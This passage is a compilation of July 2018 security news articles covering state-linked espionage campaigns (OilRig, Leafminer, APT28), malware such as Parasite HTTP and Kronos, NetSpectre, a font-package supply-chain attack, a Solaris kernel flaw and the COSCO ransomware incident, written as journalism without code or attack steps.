A CrowdStrike report published earlier this week highlighted the increasing number of cyberattacks targeting the software supply chain. Some of the largest such incidents include the NotPetya and CCleaner incidents last year, which impacted millions.


Iranian Hackers Use QUADAGENT Backdoor in Recent Attacks
28.7.2018 securityweek CyberSpy

A series of recent attacks attributed to an Iran-linked cyber-espionage group delivered a PowerShell backdoor onto compromised machines, Palo Alto Networks has discovered.

The attacks, observed between May and June 2018, were attributed to the OilRig group, which is also known as APT34 and Helix Kitten. Active since around 2015, the actor was seen using two new backdoors (RGDoor and OopsIE) earlier this year, as well as a new data exfiltration technique.

Aimed at a technology services provider and a government entity in the Middle East, the new attacks were “made to appear to have originated from other entities in the same country” and employed the QUADAGENT backdoor, Palo Alto Networks reveals.

Both the backdoor and other attack artifacts have been previously associated with the OilRig group.

The samples were nearly identical to each other, but featured different command and control (C&C) servers and randomized obfuscation (performed with the open-source toolkit called Invoke-Obfuscation).

Between May and June, the actor launched three attacks, each involving a spear phishing email appearing to originate from a government agency based in the Middle East. The account was likely compromised via credential theft.

The first two attack waves (aimed at a technology services provider) targeted email addresses that weren’t easily discoverable via search engines. The emails contained an attached exe file (converted from .bat) that was designed to install the QUADAGENT backdoor and execute it.

The dropper would run silently, would download the backdoor, create a scheduled task for persistency, and then execute the payload. The malware used rdppath[.]com as the C&C and would attempt to connect to it via HTTPS, then HTTP, then via DNS tunneling.

The third wave (against the government entity) also used a simple PE file attachment, but compiled using the Microsoft .NET Framework instead of being converted. The victim was served a fake error box when executing the malware, in an attempt to reduce suspicion. Once dropped and executed, the backdoor would connect to the C&C at cpuproc[.]com.

A third sample collected by Palo Alto Networks did not use a PE attachment but relied on a Word document containing a malicious macro for delivery. The document displayed a decoy image and asked the user to enable content, but did not use additional decoy content after execution.

The use of Word documents as a delivery mechanism has been associated with the threat actor before, and the delivery of QUADAGENT in this manner was previously documented by ClearSky Cyber Security. The sample ClearSky analyzed appears identical with the one used in the attacks against the technology services provider, Palo Alto Networks says.

“While [OilRig’s] delivery techniques are fairly simple, the various tools we have attributed as part of their arsenal reveal sophistication. In this instance, they illustrated a typical behavior of adversary groups, wherein the same tool was reused in multiple attacks, but each had enough modifications via infrastructure change, additional obfuscation, and repackaging that each sample may appear different enough to bypass security controls,” the security firm concludes.


Iran-Linked 'Leafminer' Espionage Campaign Targets Middle East
28.7.2018 securityweek CyberSpy

A group of cyberspies believed to be operating out of Iran has targeted government and other types of organizations in the Middle East since at least early 2017, Symantec revealed on Wednesday.

According to the security firm, which tracks the threat actor as Leafminer, this is a previously undocumented campaign. Symantec has detected malware and tools associated with this group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries, but researchers uncovered a list – written in Iran’s Farsi language – of more than 800 targets whose systems were apparently scanned by the attackers. This list shows that the targeted countries also include the United Arab Emirates, Qatar, Bahrain, Egypt and Afghanistan.

A significant percentage of targets were in the financial, government and energy sectors, but several other industries were targeted as well.

Leafminer targets

Leafminer has used both custom-built malware and publicly available tools in its campaign. Its attack techniques include the use of compromised web servers as watering holes, scanning and exploitation of vulnerable network services, and dictionary attacks aimed at authentication services.

One of the servers used by Leafminer stored 112 files, including malware, tools and log files generated as a result of scans and post-compromise activities.

Some of the tools in Leafminer’s arsenal were linked to other groups with apparent ties to Iran. The hackers have also leveraged widely available tools and exploits, such as the Inception Framework leaked by Shadow Brokers, which includes the infamous EternalBlue exploit.

Leafminer has also developed its own malware, including Trojan.Imecab and Backdoor.Sorgu. Sorgu provides the attackers remote access to compromised machines, while Imecab provides persistent access with a hardcoded password.

Another custom tool used by the threat actor is a modified version of the popular Mimikatz post-exploitation tool. The attackers attempt to avoid detection using a technique dubbed Process Doppelgänging, which researchers disclosed late last year. Symantec has also seen attempts to find systems vulnerable to Heartbleed attacks.

Leafminer also appears to be inspired by the Russia-linked Dragonfly group. A technique used by Dragonfly in watering hole attacks has also been spotted in the Leafminer campaign, researchers said.

Symantec pointed out that the group is “eager to learn from and capitalize on tools and techniques used by more advanced threat actors” and that it has been “tracking developments in the world of cyber security.”

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” Symantec said.


Google Announces New Security Tools for Cloud Customers
28.7.2018 securityweek Security

Google on Wednesday took the wraps off a broad range of tools to help cloud customers secure access to resources and better protect data and applications.

To improve security and deliver flexible access to business applications on user devices, Google has introduced context-aware access, which brings elements from BeyondCorp to Google Cloud.

With context-aware access, Google explains that organizations can “define and enforce granular access to GCP APIs, resources, G Suite, and third-party SaaS apps based on a user’s identity, location, and the context of their request.” This should increase security posture and decrease complexity for users, allowing them to log in from anywhere and any device.

The new capabilities are now available for select VPC Service Controls customers and should soon become available for those using Cloud Identity and Access Management (IAM), Cloud Identity-Aware Proxy (IAP), and Cloud Identity.

For increased protection against credential theft, Google announced Titan Security Key, “a FIDO security key that includes firmware developed by Google to verify its integrity.” Meant to protect users from the potentially damaging consequences of credential theft, Titan Security Keys are now available to Google Cloud customers and will soon arrive in Google Store.

Also revealed on Wednesday, Shielded VMs were designed to ensure that virtual machines haven’t been tampered with and allow users to monitor and react to any changes in the VM baseline or its current runtime state. Shielded VMs can be easily deployed on websites.

According to Google, organizations running containerized workloads should also ensure that only trusted containers are deployed on Google Kubernetes Engine. For that, the Internet giant announced Binary Authorization, which allows for the enforcing of signature validation when deploying container images.

Coming soon to beta, the tool allows for integration with existing CI/CD pipelines “to ensure images are properly built and tested prior to deployment” and can also be combined with Container Registry Vulnerability Scanning to detect vulnerable packages in Ubuntu, Debian and Alpine images before deployment.

Google also announced the beta availability of geo-based access control for Cloud Armor, a distributed denial of service (DDoS) and application defense service. The new capability allows organizations to control access to their services based on the geographic location of the client.

Cloud Armor, however, can also be used for “whitelisting or blocking traffic based on IP addresses, deploying pre-built rules for SQL injection and cross-site scripting, and controlling traffic based on Layer 3-Layer 7 parameters of your choice.”

Cloud HSM, a managed cloud-hosted hardware security module (HSM) service coming soon in beta, allows customers to host encryption keys and perform cryptographic operations in FIPS 140-2 Level 3 certified HSMs and to easily protect sensitive workloads without having to manage a HSM cluster.

Courtesy of tight integration with Cloud Key Management Service (KMS), Cloud HSM makes it “simple to create and use keys that are generated and protected in hardware and use it with customer-managed encryption keys (CMEK) integrated services such as BigQuery, Google Compute Engine, Google Cloud Storage and DataProc,” Google says.

Earlier this year, the search company launched Asylo, an open source framework and software development kit (SDK) meant to “protect the confidentiality and integrity of applications and data in a confidential computing environment.”

With Access Transparency, Google logs the activity of Google Cloud Platform administrators who are accessing content. While GCP’s Cloud Audit Logs no longer provide visibility into the actions of administrators when the cloud provider’s Support or Engineering team is engaged, Access Transparency captures “near real-time logs of manual, targeted accesses by either support or engineering.”

Google also announced the investigation tool for G Suite customers, to help identify and act upon security issues within a domain. With this tool, admins can “conduct organization-wide searches across multiple data sources to see which files are being shared externally” and then perform bulk actions on limiting files access.

Google is also making it easier to move G Suite reporting and audit data from the Admin console to Google BigQuery. Furthermore, there are five new container security partner tools in Cloud Security Command Center to help users gain more insight into risks for containers running on Google Kubernetes Engine.

To meet customer requirements on where their data is stored, Google announced data regions for G Suite, a tool that allows G Suite Business and Enterprise customers “to designate the region in which primary data for select G Suite apps is stored when at rest—globally, in the U.S., or in Europe.”

To these, Google adds the Password Alert policy for Chrome Browser, which allows IT admins to “prevent their employees from reusing their corporate password on sites outside of the company’s control, helping guard against account compromise.”


Tenable Soars on IPO Day
28.7.2018 securityweek IT

Tenable Holdings, parent of veteran cybersecurity firm Tenable Network Security, celebrated its much-anticipated initial public offering (IPO) by raising roughly $250 million through the sale of 10.9 million shares at $23 per share.

The Columbia, Md.-based company began trading on the Nasdaq Global Select Market on Thursday under the ticker symbol “TENB”.

Joe Brantuck of Nasdaq with Tenable CEO Amit YoranShares of the company jumped more than 45% in early trading, reaching nearly $34 per share at the time of publishing, pushing the company’s market cap above $3 billion.

Founded in 2002, Tenable is known for its vulnerability scanners and software solutions that help find network security gaps. The company has more than 24,000 customers across 160 countries, including more than 50 percent of Fortune 500 companies and nearly 30 percent of Global 2000 firms.

In late 2017, Tenable announced a partnership with Siemens that aims to provide asset discovery and vulnerability management solutions for industrial networks.

Before going public, Tenable had raised more than $300 million, including $250 million in November 2015 and $50 million in September 2012.

Currently led by CEO Amit Yoran, former President of RSA and former National Cybersecurity Director at the U.S. Department of Homeland Security, Tenable had revenue of $187.7 million in 2017 and reported a net loss of $41 million for the year.


Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.2018 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to national agencies demanding a collaboration on ending the government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill-off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the inherited security vulnerabilities in the plugin as the main reason to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) has warned about the risks of using Flash nearly a decade ago, the letter also reads.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threat.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.


Dutch Court Sentences CoinVault Ransomware Authors to Community Service
28.7.2018 securityweek
Ransomware

Two Dutch men were sentenced on Thursday to 240 hours of community service for creating and using the CoinVault ransomware.

The suspects are brothers, identified by Dutch media as Melvin and Dennis van den B., currently aged 25 and 21, respectively. They were both arrested in 2015 and accused of creating CoinVault, one of the first pieces of file-encrypting ransomware, and its successor, Bitcryptor.

Their trial took place on July 12 and they have now been sentenced to 240 hours of community service, which is the maximum time of community service someone can serve. They have also been ordered to pay restitution to some of their victims.

Prosecutors asked for a three-month prison sentence and nine months suspended in addition to community service. However, the sentence has been reduced due to the fact that the brothers cooperated with the police, including to help victims recover their files, and have not committed any other crimes since their arrest in 2015.

The suspects were accused of hacking into computers and extorting nearly 1,300 individuals. However, Kaspersky Lab, which investigated CoinVault back in 2014 when the threat emerged and helped police identify the hackers, noted that there were actually roughly 14,000 victims worldwide.

A decryption tool for the CoinVault ransomware is available from the NoMoreRansom initiative, but some victims have not been able to recover their files due to some implementation errors that prevented recovery even with the decryption keys.

The cybercriminals were identified by Dutch police after Kaspersky researchers found a first name in the malware code. According to some reports, the CoinVault authors also failed to hide their real IP address on at least one occasion.

“Cybercrime doesn’t pay,” said Kaspersky Lab researcher Jornt van der Wiel, commenting on the case. “If you become a victim of criminal or ransomware activity, keep your files and report the incident to the police. Never pay the ransom and be confident that not only will the decryption tool appear, but also that justice will triumph in regards to the criminals.”


Parasite HTTP RAT Packs Extensive Protection Mechanisms
28.7.2018 securityweek
Virus

A newly discovered remote access Trojan (RAT) dubbed Parasite HTTP includes a broad range of protections, including sandbox detection, anti-debugging, anti-emulation, and more, Proofpoint reports.

Dubbed Parasite HTTP, the malware is being advertised on an underground forum and has already been used in an infection campaign. Courtesy of a modular architecture, the malware’s capabilities can be expanded with the addition of new modules after infecting a system.

The threat was recently used in a small email campaign targeting recipients primarily in the information technology, healthcare, and retail industries. The emails contained Microsoft Word attachments with malicious macros designed to download the RAT from a remote site.

Written in C, the tool is advertised as having no dependencies, a small size of around 49Kb, and plugin support. Moreover, its author claims the malware supports dynamic API calls, has encrypted strings, features a secure command and control (C&C) panel written in PHP, can bypass firewalls, and features encrypted communications.

Among other features, the author also advertises a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” Proofpoint says.

In addition to string obfuscation, Parasite HTTP features a sleep routine to delay execution and check for sandboxes or emulation. It first checks if an exception handler has run, then checks “whether between 900ms and two seconds elapsed in response to the routine’s 1 second sleep split into 10ms increments.”

When detecting a sandbox, the malware does not simply exit or throw an error, but attempts to make it more difficult to determine why it crashed. The RAT also uses code from a public repository for sandbox detection.

“Parasite HTTP also contains a bug caused by its manual implementation of a GetProcAddress API that results in the clearing code not executing,” Proofpoint's security researchers warn.

On Windows 7 and newer versions, the threat resolves critical APIs for creating its registry values. It also uses a process injection technique that isn’t used by major malware families.

The malware includes an obfuscated check for debugger breakpoints within a range of its own code. Parasite HTTP also removes hooks on a series of DLLs, but only restores the first 5 bytes to the original, which would likely result in a crash if a sandbox is using an indirect jump (6 bytes) for its hooks.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint says.


Remote Spectre Attack Allows Data Theft Over Network
28.7.2018 securityweek Attack

A team of researchers from the Graz University of Technology in Austria has demonstrated that Spectre attacks can be launched remotely without the need to execute code on the targeted machine.

The researchers, some of which were also involved in the discovery of the original Meltdown and Spectre vulnerabilities, have dubbed the new attack NetSpectre as it allows a remote attacker to read arbitrary memory data over the network.

NetSpectre attacks have been successfully conducted by the experts both in a local area network (LAN) and between virtual machines in Google Cloud.

While NetSpectre attacks can in theory pose a significant risk, data can only be leaked very slowly. Researchers achieved an exfiltration rate of 15 bits per hour over a local network, and 60 bits per hour by using a new AVX-based covert channel instead of a cache covert channel. This is the first Spectre attack that does not use a cache covert channel.NetSpectre - Spectre attacks can be launched remotely

In experiments conducted using Google Cloud, researchers managed to leak data from an independent virtual machine at a rate of 3 bits per hour.

The Spectre and Meltdown speculative execution vulnerabilities impact processors from Intel, AMD, ARM and other companies, and they allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. There are several variants of each flaw, but the original vulnerabilities are Spectre (Variant 1 and Variant 2) and Meltdown (Variant 3).

Exploitation of these flaws has required executing arbitrary code on the targeted system, but NetSpectre, which is related to Variant 1, shows that remote attacks are possible without executing code on the victim’s device.

Researchers also demonstrated that this remote attack method can also be used to break the address-space layout randomization (ASLR) mitigation even if no data is leaked.

Fortunately, NetSpectre attacks can be prevented using the mitigations recommended for the original Spectre. In addition, since this is a network-based attack, network-layer countermeasures can also be efficient in blocking threats.

“A trivial NetSpectre attack can easily be detected by a DDoS protection, as multiple thousand identical packets are sent from the same source,” researchers explained. “However, an attacker can choose any trade-off between packets per second and leaked bits per second. Thus, the speed at which bits are leaked can simply be reduced below the threshold that the DDoS monitoring can detect. This is true for any monitoring which tries to detect ongoing attacks, e.g., intrusion detection systems. Although the attack is theoretically not prevented, at some point the attack becomes infeasible, as the time required to leak a bit increases drastically.”

However, experts warned that new methods may be found in the future that bypass current protections and mitigations.

Intel has updated its whitepaper titled “Analyzing potential bounds check bypass vulnerabilities” to include NetSpectre attacks.

Jon Masters, Chief Arm Architect and Computer Microarchitecture Lead at Red Hat, says his company has “not identified any viable userspace spectre gadget attacks but are actively auditing all of the daemons that listen over the network and the rest of the stack.”


Twitter removed more than 143,000 apps from the messaging service
28.7.2018 securityaffairs
Social

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.
Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

jack

@jack
We’re committing Twitter to help increase the collective health, openness, and civility of public conversation, and to hold ourselves publicly accountable towards progress.

5:33 PM - Mar 1, 2018 · San Francisco, CA
14.3K
11.7K people are talking about this
Twitter Ads info and privacy
The social media giant was restricting the access to its application programming interfaces (APIs) that allows developers to automate the interactions with the platform (i.e. Tweet posting).

Spam and abuse issues are important problems for the platform, every day an impressive number of bots is used to influence the sentiment on specific topics or to spread misinformation or racism content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter it a hard task, now since Tuesday, Twitter deployed a new application process for developers that intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.”Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service,”

Twitter messaging service

Anyway, there are many legitimate applications that used Twitter APIs to automate several processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.


Russian APT28 espionage group targets democratic Senator Claire McCaskill
28.7.2018 securityaffairs APT

The Russia-linked APT28 group targets Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The Russian APT group tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), that operated under the Russian military agency GRU, continues to target US politicians.

This time the target is Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.

The news was reported by The Daily Beast, McCaskill always expressed criticism of Russia and its aggressive strategy in the cyberspace. McCaskill has repeatedly accused the Russian Government of “cyber warfare against our democracy,” she defined President Vladimir Putin as a “thug” and a “bully.”

Russian cyberspies launched spear-phishing attacks against the member of the staff aimed at stealing their credentials, a tactic already used against Hillary Clinton campaign manager John Podesta in 2016.

The phishing messages contained fake notifications instructing the victims to change their Microsoft Exchange passwords.

“The attempt against McCaskill’s office was a variant of the password-stealing technique used by Russia’s so-called “Fancy Bear” hackers against Clinton’s campaign chairman, John Podesta, in 2016.” reads the report published by The Daily Beast.

“The hackers sent forged notification emails to Senate targets claiming the target’s Microsoft Exchange password had expired, and instructing them to change it. If the target clicked on the link, he or she was taken to a convincing replica of the U.S. Senate’s Active Directory Federation Services (ADFS) login page, a single sign-on point for e-mail and other services.”

democratic Senator Claire McCaskill

In July, Microsoft helped the US Government is protecting at least three 2018 midterm election candidates from attacks of Russian cyberspies.

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website it has taken down it and helped the US government to “avoid anybody being infected by that particular attack.”

“In October, Microsoft wrested control of one of the spoofed website addresses—adfs.senate.qov.info. Seizing the Russians’ malicious domain names has been easy for Microsoft since August 2017, when a federal judge in Virginia issued a permanent injunction against the GRU hackers, after Microsoft successfully sued them as unnamed “John Doe” defendants.” continues the report.

Microsoft made sinkholing of the website, in this way it was able to track victims of the attacks that were redirected to the phishing attack.

The Daily Beast identified McCaskill as a target while investigating statements made by Microsoft VP Tom Burt during his speech at the Aspen Security Forum.

Microsoft attributed the attacks to Russian APT28 group.

McCaskill released a statement confirming that cyberattack was unsuccessful.

“Russia continues to engage in cyber warfare against our democracy. I will continue to speak out and press to hold them accountable,” McCaskill said.

“While this attack was not successful, it is outrageous that they think they can get away with this. I will not be intimidated. I’ve said it before and I will say it again, Putin is a thug and a bully.”


Google bans cryptocurrency mining apps from the official Play Store
28.7.2018 securityaffairs Cryptocurrency

Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.
Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.

Following Apple’s decision of banning cryptocurrency mining apps announced in June, also Google has updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the devices.

“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.

Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.
Mining activities have a dramatic effect on the performance of the device and in some cases, it could also damage it by causing overheat or destroy batteries.

In December, experts from Kaspersky have spotted an Android malware dubbed Loapi that includes a so aggressive mining component that it can destroy your battery.

mining apps

Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.

Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.


Microsoft revealed details of a supply chain attack at unnamed Maker of PDF Editor
28.7.2018 securityaffairs Attack

Microsoft revealed that hackers attempted to compromise the supply chain of an unnamed maker of PDF software.
The attackers compromised a font package installed by a PDF editor app and used it to spread a crypto-mining malware on victims’ machines.

The attack was discovered by the experts from Microsoft that received alerts via the Windows Defender ATP.

Microsoft discovered that attackers compromised the cloud server infrastructure of a software company that provides font packages for other software firms.

The packages are distributed as MSI files and experts revealed that one of the companies using these packages was the firm that developed the PDF editor application.

The compromise lasted between January and March 2018, according to the tech giant the hackers compromised only a small number of machines, this could indicate that the hacked companies working with the font package provider have a small market share.

This is a multi-tier attack in which the attackers compromised the supply chain of the supply chain.

“A new software supply chain attack unearthed by Windows Defender Advanced Threat Protection (Windows Defender ATP) emerged as an unusual multi-tier case.” reads the analysis published by Microsoft.

“Unknown attackers compromised the shared infrastructure in place between the vendor of a PDF editor application and one of its software vendor partners, making the app’s legitimate installer the unsuspecting carrier of a malicious payload.”

Supply chain attack-diagram-3

The hackers cloned the infrastructure of the company that develops the PDF Editor, they set up a server containing all MSI files, including font packages, all clean and digitally signed.

The hackers poisoned an MSI file associated with an Asian fonts pack with a crypto miner, then devised a technique to influence the download of the font by the PDF Editor from the attackers’ server.

Once the victims have installed the PDF editor app, the application will install the font packages from the cloned server managed by the attackers, including the tainted one.

Below the multi-tier attack described by Microsoft:

Attackers recreated the software partner’s infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font package, all clean and digitally signed, in the replica sever.
The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code. With this package tampered with, it is no longer trusted and signed.
Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the app. The parameters included a new download link that pointed to the attacker server.
As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers’ replica server instead of the software partner’s server.
The attackers have targeted the supply chain by hiding the miner in an installer to have full elevated privileges (SYSTEM) on a machine.

The crypto-mining malware would create a process named xbox-service.exe that abuses the computational resources of the victims to mine Monero coins.

The malware also tries to modify the Windows hosts file so that the victim’s machine can’t communicate with the update servers of certain PDF apps and security software. The trick would prevent remote cleaning and remediation of affected machines.


Kronos Banking Trojan resurrection, new campaigns spotted in the wild
28.7.2018 securityaffairs
Virus

Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that was involved in several attacks in the recent months.
The infamous Kronos banking Trojan is back, and according to the experts from Proofpoint it was involved in several attacks in the last months.

The malware was first spotted in 2014 by researchers at security firm Trusteer that discovered an adv on the Russian underground market regarding a new financial Trojan dubbed Kronos.

Kronos banking trojan

The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.

The new variants share many similarities with older versions:

Extensive code overlap
Same Windows API hashing technique and hashes
Same string encryption technique
Extensive string overlap
Same C&C encryption mechanism
Same C&C protocol and encryption
Same webinject format (Zeus format)
Similar C&C panel file layout
“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” continues the analysis.

“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”

Since April 2018, experts discovered new samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is represented by the command and control (C&C) mechanism that leverages the Tor anonymizing network.

“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.

A first campaign was observed on June 27, the malware was targeting German users with weaponized documents attached to spam emails. The macros included in the document was used as downloader for the payload, in some cases, the SmokeLoader downloader.

A second campaign was uncovered on July 13, the victims were infected through a malvertising campaign. The malicious ads pointed out to a website that thanks to JavaScript injections redirected visitors to the RIG exploit kit, that delivered SmokeLoader. The downloader would deliver the Kronos onto the compromised machines.

A third campaign was observed since July 15 and sees victims receiving fake invoice emails carrying weaponized documents that attempted to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.

The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.

The fourth campaign started on July 20 and according to the experts it is still ongoing.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.

“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,”


Experts discovered a Kernel Level Privilege Escalation in Oracle Solaris
28.7.2018 securityaffairs
Vulnerebility

Security expert discovered Kernel Level Privilege Escalation vulnerability in the Availability Suite Service component of Oracle Solaris 10 and 11.3
Security researchers from Trustwave have discovered a new high severity vulnerability, tracked as CVE-2018-2892, that affected the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The flaw could be exploited by a remote authenticated attacker to execute code with elevated privileges.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation.” reads the security advisory published by the company.

“The issue is the result of a signedness bug in the bounds checking of the ‘SDBC_TEST_INIT’ ioctl code sent to the ‘/dev/sdbc‘ device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

The experts discovered that the flaw was first discovered in 2007 and it was publicly disclosed in 2009 during the CanSecWest security conference.

The vulnerability is the result of a combination of several arbitrary memory dereference issued and an unbounded memory write vulnerability.

“The original issue was disclosed on stage at CanSec 2009 ( https://cansecwest.com/slides.html).” reads the analysis published by Trustwave. “The root cause of the issue is a combination of an arbitrary memory dereference through a lack of bounds checking on a user-controlled array index combined with an unbounded user-controllable length in the call to copyin(). The combined result is an arbitrary memory write and overflow in the call to copyin().”

oracle solaris

Oracle also rolled out a security patch after the issue was disclosed, but evidently the problem was not totally addressed.

“Exploitation of the issue is almost identical to the exploit developed back in 2007 for the original issue with the exception of a change in architecture between OpenSolaris running on x86 (32-bit) and the newer Oracle Solaris 11 running on x86-64 taking into account that the user-supplied index uap->ar must now be a negative value.” continues Trustwave.

According to the experts, the flaw is still present in the solution due to the introduction of additional code used for testing purposes.

Oracle addressed this flaw as a part of the July CPU security updates


Ransomware attack disrupted some systems of the shipping giant COSCO in the US
28.7.2018 securityaffairs
Ransomware

The Chinese shipping giant COSCO was reportedly hit by a ransomware based attack, the attack occurred in the American region.
According to COSCO a “local network breakdown” disrupted some systems in the United States.

Media confirmed the incident was the result of a ransomware attack and quoted a company spokesman as the source.

“The China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyberattack on Tuesday, July 24.” states local media.

“A spokesman for the Shanghai-based company, which acknowledged the ransomware attack Tuesday, said that the company’s operations outside the United States were not affected.”

cosco ransomware

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“Due to local network breakdown within our America regions, local email and network telephone cannot work properly at the moment. For safety precautions, we have shut down the connections with other regions for further investigations.” reads the security advisory published by COSCO.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,”

The Journal of Commerce, citing COSCO Vice President Howard Finkel, reported communications between the carrier’s U.S. operations and its customers has been slowed due to the cyber attack. Digital communications were disrupted and the communications were going on via telephone.

View image on Twitter
View image on Twitter

JOC.com
@JOC_Updates
Cosco responds to cyber attack on US operations #maritime #containers http://bit.ly/2uMjJJS

10:52 PM - Jul 24, 2018
13
See JOC.com's other Tweets
Twitter Ads info and privacy
Port of Long Beach spokesman Lee Peterson confirmed the attack and added that it is monitoring the situation.

